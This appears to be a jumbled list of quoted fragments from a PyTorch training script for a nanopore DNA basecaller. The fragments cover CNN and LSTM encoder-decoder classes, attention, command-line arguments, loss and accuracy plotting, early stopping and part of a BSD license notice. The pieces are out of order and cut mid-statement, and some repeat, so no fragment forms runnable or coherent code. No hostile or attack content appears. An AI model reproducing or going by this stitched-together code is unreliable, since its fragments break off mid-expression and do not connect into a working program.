"{}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\")",
"when seq length (i) >= true seq length if i >= true_y_len[-1].item() and",
"the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out,",
"return outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def",
"bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11",
"not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val +=",
"x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch,",
"self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for i in",
"port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1)",
"parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?',",
"b), where a and b both have shape (num_layers, batch_size, hidden_dim). # Sort",
"one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val !=",
"pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq: if p",
"dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters()",
"ord=2) # output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx]",
"and if it has, it will make a checkpoint of the current model",
"+= ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd /",
"the above copyright notice, this list of conditions and the following disclaimer in",
"= label if teacher_force else onehot # [batch size, out dim] return outputs,",
"lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert",
"updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for",
"help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) #",
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED",
"trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in",
"SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher",
"= own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM",
"nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim,",
"input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2,",
"= np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p",
"def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = []",
"reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\")",
"editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3],",
"loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig",
"= n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b +=",
"teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features #",
"* 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd",
"vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5:",
"torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size,",
"help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number",
"own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch,",
"as F import torchvision import pickle import random import time import matplotlib.pyplot as",
"fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation:",
"self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate)",
"input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a,",
"the following disclaimer in the documentation and/or other materials provided with the distribution.",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1))",
"Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input,",
"if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check",
"p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i",
"np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch ==",
"key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on trainings",
"# initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr)",
"args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn",
"self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type,",
"args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD = args.editD",
"param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 # ordering ingate,",
"as pd import argparse from distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0,",
"# early_stopping needs the validation loss to check if it has decresed, #",
"help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on",
"encode input input_decoder = label if teacher_force else onehot # [batch size, out",
"type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\",",
"ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit",
"sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder",
"vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit",
"fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3,",
"m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in",
"#### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm",
"count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name,",
"= param.size(0) # forget gate start, end = n//4, n//2 # ordering ingate,",
"list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"{} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {}",
"batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if",
"(sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch,",
"!= 5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item())",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if",
"= lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :]",
"parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio.",
"* 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear =",
"n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end =",
"read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port),",
"val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size())",
"help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output",
"if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD:",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda)",
"minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1],",
"torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size",
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR",
"in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str,",
"ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close()",
"= data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable",
"nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value,",
"%\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()),",
"GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch",
"val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set =",
"return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i',",
"else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output",
"Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val,",
"name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate",
"* 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y,",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;",
"nn from torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle",
"type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number",
"delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {}",
"from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v",
"len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0",
"1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate',",
"== 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc),",
"num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq =",
"train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue",
"[] for name in y_len: if \"bias\" in name and \"lstm\" in name",
">= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: #",
"{} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {}",
"loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else:",
"b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature),",
"LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size",
"1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments",
"decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type,",
"def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input",
"sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0])",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys())",
"= dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and",
"forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size",
"torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder =",
"+=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close()",
"else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has",
"= cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] =",
"hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder",
"dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset =",
"make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all",
"seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target,",
"dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel =",
"# Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\",",
"bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim,",
"batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort",
"= 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val =",
"sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999))",
"help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) #",
"default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\")",
"loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args",
"= [] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred",
"model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2,",
"on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True)",
"and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end",
"len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for",
"editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda",
"dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1)",
"dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1:",
"size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder =",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2)",
"bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 *",
"x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive",
"x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate,",
"[dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in",
"parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port",
"validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in",
":, :] # sort labels so that they match with order in batch",
"out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1,",
"gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) #",
"= np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train',",
"True # Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3:",
"__eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore",
"nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network",
"lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF))",
"end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end)",
"got to the last element in the batch if i == max_in_batch: break",
"+= loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() /",
"train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue",
"[\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head())",
"None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0",
"+ 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val",
"LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train],",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float,",
"= dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll =",
"original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0,",
"label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) #",
"[] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero",
"optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input",
"make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop",
"= val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len =",
"{:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val +",
"= get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the",
"{} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {}",
"Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling",
"default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) #",
"looping if we got to the last element in the batch if i",
"1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) #",
"--> (batch_size, out_dim) #decide if we are going to use teacher forcing or",
"loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd",
"key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\")",
"self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim",
"len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val,",
"padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden =",
"MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch",
"pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5)",
"= nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim,",
"labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm,",
"performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\")",
"# ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size",
"pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) #",
"= args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay =",
"CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional =",
"+ infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path =",
"c) label = y[not_padded_batches, :, i] # batch-i, features, seq len y =",
"y_len: if \"bias\" in name and \"lstm\" in name and \"linear\" not in",
"size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher",
"= h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear",
"== 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator",
"{0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} #",
"idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]])",
